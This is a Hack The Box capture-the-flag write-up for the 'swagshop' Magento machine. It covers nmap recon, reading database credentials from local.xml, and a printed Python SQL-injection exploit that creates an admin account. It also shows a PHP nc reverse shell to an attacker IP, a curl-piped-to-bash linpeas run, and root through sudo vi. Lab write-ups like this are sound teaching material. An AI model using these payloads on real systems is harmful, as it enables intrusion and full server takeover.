swagshop

Mar 13, 2021 TJNull's List
Share on:

swagshop

Introduction:

The swagshop machine presents a vulnerable Magento installation for which you may not look beyond basic enumeration and look up exploits once you have figured out the version.

Recon

NMAP Scan

 1eneloop@kinetic:.../hackthebox/swagshop/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.swagshop.txt 10.10.10.140
 2Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 08:26 EST
 3Nmap scan report for 10.10.10.140
 4Host is up (0.084s latency).
 5Not shown: 998 closed ports
 6PORT   STATE SERVICE VERSION
 722/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 8| ssh-hostkey: 
 9|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
10|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
11|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
1280/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
13|_http-server-header: Apache/2.4.18 (Ubuntu)
14|_http-title: Home page
15No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
16TCP/IP fingerprint:
17OS:SCAN(V=7.91%E=4%D=3/13%OT=22%CT=1%CU=43209%PV=Y%DS=2%DC=I%G=Y%TM=604CBDA
18OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
19OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
20OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
21OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
22OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
23OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
24OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
25OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
26OS:=S)
27
28Network Distance: 2 hops
29Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
30
31OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
32Nmap done: 1 IP address (1 host up) scanned in 24.18 seconds

Enumeration

wapalyzer

Footer Version -

home page

© 2014 Magento Demo Store. All Rights Reserved.

Magento Versions

 1eneloop@kinetic:.../hackthebox/swagshop/data$ searchsploit magento
 2----------------------------------------------------------------------------------- ---------------------------------
 3 Exploit Title                                                                     |  Path
 4----------------------------------------------------------------------------------- ---------------------------------
 5eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection                       | php/webapps/38573.txt
 6eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Ser | php/webapps/38651.txt
 7Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cros | php/webapps/32808.txt
 8Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email | php/webapps/32809.txt
 9Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                          | php/webapps/32810.txt
10Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                     | php/webapps/39838.php
11Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution                       | php/webapps/37811.py
12Magento eCommerce - Local File Disclosure                                          | php/webapps/19793.txt
13Magento eCommerce - Remote Code Execution                                          | xml/webapps/37977.py
14Magento Server MAGMI Plugin - Multiple Vulnerabilities                             | php/webapps/35996.txt
15Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                        | php/webapps/35052.txt
16Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass       | php/webapps/48135.php
17----------------------------------------------------------------------------------- ---------------------------------

https://www.cloudways.com/blog/magento-versions/

eneloop

mysql password - http://10.10.10.140/app/etc/local.xml

 1<config>
 2<global>../swagshop/data
 3<install>
 4<date>Wed, 08 May 2019 07:23:09 +0000</date>
 5</install>
 6<crypt>
 7<key>b355a9e0cd018d3f7f03607141518419</key>
 8</crypt>
 9<disable_local_modules>false</disable_local_modules>
10<resources>
11<db>
12<table_prefix></table_prefix>
13</db>
14<default_setup>
15<connection>
16<host>localhost</host>
17<username>root</username>
18<password>fMVWh7bDHpgZkyfqQXreTjU9</password>
19<dbname>swagshop</dbname>
20<initStatements>SET NAMES utf8</initStatements>
21<model>mysql4</model>
22<type>pdo_mysql</type>
23<pdoType></pdoType>
24<active>1</active>
25</connection>
26</default_setup>
27</resources>
28<session_save>files</session_save>
29</global>
30<admin>
31<routers>
32<adminhtml>
33<args>
34<frontName>admin</frontName>
35</args>
36</adminhtml>
37</routers>
38</admin>
39</config>

Exploitation

Install Date

 1(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ cat create_admin_37977.py 
 2import requests
 3import base64
 4import sys
 5
 6target = "http://10.10.10.140/index.php"
 7
 8if not target.startswith("http"):
 9    target = "http://" + target
10
11if target.endswith("/"):
12    target = target[:-1]
13
14target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
15
16q="""
17SET @SALT = 'rp';
18SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
19SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
20INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
21INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
22"""
23
24
25query = q.replace("\n", "").format(username="enp", password="enp12345")
26pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
27
28# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
29r = requests.post(target_url, 
30                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
31                        "filter": base64.b64encode(pfilter),
32                        "forwarded": 1})
33if r.ok:
34    print "WORKED"
35    print "Check {0}/admin with creds forme:forme".format(target)
36else:
37    print "DID NOT WORK"
38
39(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ 

1(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ python ./create_admin_37977.py 
2WORKED
3Check http://10.10.10.140/index.php/admin with creds forme:forme
4(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ 
5

Admin Login

Froghopper exploit

https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

PHP reverse shell upload

1<?php
2passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 4444 >/tmp/f");
3?>

Category Upload shell

Verify Upload

Froghopper Exploit

Froghopper Preview Template

Attacker listener

 1eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 4444
 2listening on [any] 4444 ...
 3connect to [10.10.14.20] from (UNKNOWN) [10.10.10.140] 60510
 4/bin/sh: 0: can't access tty; job control turned off
 5$ 
 6$ whoami
 7www-data
 8$ cat /etc/passwd
 9root:x:0:0:root:/root:/bin/bash
10daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
11bin:x:2:2:bin:/bin:/usr/sbin/nologin
12sys:x:3:3:sys:/dev:/usr/sbin/nologin
13sync:x:4:65534:sync:/bin:/bin/sync
14games:x:5:60:games:/usr/games:/usr/sbin/nologin
15man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
16lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
17mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
18news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
19uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
20proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
21www-data:x:33:33:www-data:/var/www:/bin/bash
22backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
23list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
24irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
25gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
26nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
27systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
28systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
29systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
30systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
31syslog:x:104:108::/home/syslog:/bin/false
32_apt:x:105:65534::/nonexistent:/bin/false
33lxd:x:106:65534::/var/lib/lxd/:/bin/false
34mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
35messagebus:x:108:112::/var/run/dbus:/bin/false
36uuidd:x:109:113::/run/uuidd:/bin/false
37dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
38sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
39haris:x:1000:1000:haris,,,:/home/haris:/bin/bash
40$ cd /home/haris
41$ ls -l
42total 4
43-rw-r--r-- 1 haris haris 33 May  8  2019 user.txt
44$ cat user.txt
45

Post-exploit/PrivEsc

Linpeas

1$ curl http://10.10.14.20:8000/linpeas.sh|bash
2

 1[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
 2[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
 3Matching Defaults entries for www-data on swagshop:
 4    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 5
 6User www-data may run the following commands on swagshop:
 7    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
 8Defaults	env_reset
 9Defaults	mail_badpass
10Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
11root	ALL=(ALL:ALL) ALL
12%admin ALL=(ALL) ALL
13%sudo	ALL=(ALL:ALL) ALL
14www-data ALL=NOPASSWD:/usr/bin/vi /var/www/html/*
15

 1$ 
 2$ sudo -l
 3Matching Defaults entries for www-data on swagshop:
 4    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 5
 6User www-data may run the following commands on swagshop:
 7    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
 8$ sudo /usr/bin/vi /var/www/html/*
 9Vim: Warning: Output is not to a terminal
10Vim: Warning: Input is not from a terminal
11
12
13<h4>Open Software License ("OSL") v. 3.0</h4>
14
15<p>This Open Software License (the "License") applies to any original work of au
16thorship (the "Original Work") whose owner (the "Licensor") has placed the follo
17wing licensing notice adjacent to the copyright notice for the Original Work:</p
18>
19<h5>Licensed under the Open Software License version 3.0</h5>
20:!/bin/shof Copyright License. Licensor grants You a worldwide, royalty-free, no
21n-exclusive, sublicensable license, for the duration of the copyright, to do the
22 following:</p>
23<ul class="disc">
24    <li>to reproduce the Original Work in copies, either alone or as part of a c
25ollective work</li>
26    <li>to translate, adapt, alter, transform, modify, or arrange the Original W
27ork, thereby creating derivative works ("Derivative Works") based upon the Origi
28nal Work</li>
29    <li>to distribute or communicate copies of the Original Work and Derivative
30Works to the public, with the proviso that copies of Original Work or Derivative
31 Works that You distribute or communicate shall be licensed under this Open Soft
32ware License</li>
33    <li>to perform the Original Work publicly</li>
34    <li>to display the Original Work publicly</li>
35</ul>
36:!/bin/sh
37
38whoami
39root
40cd /root
41ls
42root.txt
43
44

Notes: